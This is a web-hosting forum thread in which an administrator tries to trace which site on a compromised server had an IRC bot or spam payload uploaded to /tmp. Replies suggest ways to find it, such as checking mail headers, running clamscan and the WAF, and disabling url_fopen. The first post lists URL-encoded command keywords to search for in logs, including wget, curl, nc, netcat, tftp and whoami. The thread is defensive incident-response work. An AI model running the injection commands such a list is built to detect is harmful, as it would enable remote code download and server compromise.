Finding Site That Spam Payload was Dumped to

[KrazyBob]

I am getting pretty good at locating the string of the filename of a spam/irc/other injection script. But I have a hell of a time actually finding the site. I use:

Code: Select all

grep '/tmp/robots.txt' /var/www/vhosts/*/statistics/logs/*

or

cat /var/www/vhosts/*/statistics/logs | grep '/tmp/robots.txt'
[code]

These seldom work. What are some other was I night try?

[code]
Linux - Log File Search

Unscripted search phrases. Would love to make a script that would check each one...

+   '%20/tmp',
+   '%20/var',
+   '7z%20',
+   'apt-get%20',
+   'cat%20',
+   'cc%20',
+   'cd%20',
+   'crontab%20',
+   'curl%20',
+   'cvs%20',
+   'echo%20',
+   'elinks%20',
+   'emerge%20',
+   'ftp%20',
+   'GET%20',
+   'gcc%20',
+   'gzip%20',
+   'gunzip%20',
+   'HEAD%20',
+   'id%20',
+   'kill%20',
+   'killall%20',
+   'links%20',
+   'ls%20',
+   'lwp-download%20',
+   'lwp-request%20',
+   'lwp-mirror%20',
+   'lwp-rget%20',
+   'lynx%20',
+   'mail%20',
+   'mailx%20',
+   'mkdir%20',
+   'nc%20',
+   'ncftp%20',
+   'netcat%20',
+   'netstat%20',
+   'POST%20',
+   'perl%20',
+   'ps%20',
+   'python%20',
+   'rar%20',
+   'rexec%20',
+   'rm%20',
+   'rpm%20',
+   'ruby%20',
+   'scp%20',
+   'sh%20',
+   'smbclient%20',
+   'ssh%20',
+   'svn%20',
+   'tar%20',
+   'telnet%20',
+   'tftp%20',
+   'wget%20',
+   'uname%20',
+   'wget%20',
+   'whoami%20',
+   'yum%20',

[prupert]

If the mail is sent via PHP the file name and UID are logged in the mail headers. Can't get anymore easy than that.

[KrazyBob]

I'm sorry for the confusion, but mail was not mentioned at all. In fact the issue is an IRC bot that is activating init[0] twice. We found the files. The payloads where uploaded into the /tmp DIR and then deleted as indicated by ps auxf and top -c when I grab the PID. I hope that this helps clarify the question.

[faris]

Nope, not clear at all. Sorry Bob!

Let me see if I'm on the right track:

The bad guys have managed to compromise a VPS (or a website on a VPS).
Although it could have been done in a different way, it was most probably achieved via a vulnerability in a website script (or by access to the site's username/password).

What you want to do now is identify which site is/was compromised.

Is all that correct?

If so....

Have you tried that script I mentioned a while ago -- the one the Parallels people released that looks for certain types of compromises and removes them. However, if that gets any hits, a mass username/password change would be in order, I think.

Does clamscan give a clean bill of health on everything in /var/www/ ? (and indeed the entire server, once you have removed the harmful stuff)?

Have you tried looking in the logs for clamd/clamav events? I'm thinking that if they used FTP (and you have the FTP clamd upload scanning enabled), 99.99% of bad stuff would have been blocked. Maybe they tried lots of different scripts until they found one that slipped through? In which case you might be able to identify which site it was.

The same would apply to the Plesk FileManager if you have the Plesk WAF enabled.

Is url_fopen disabled?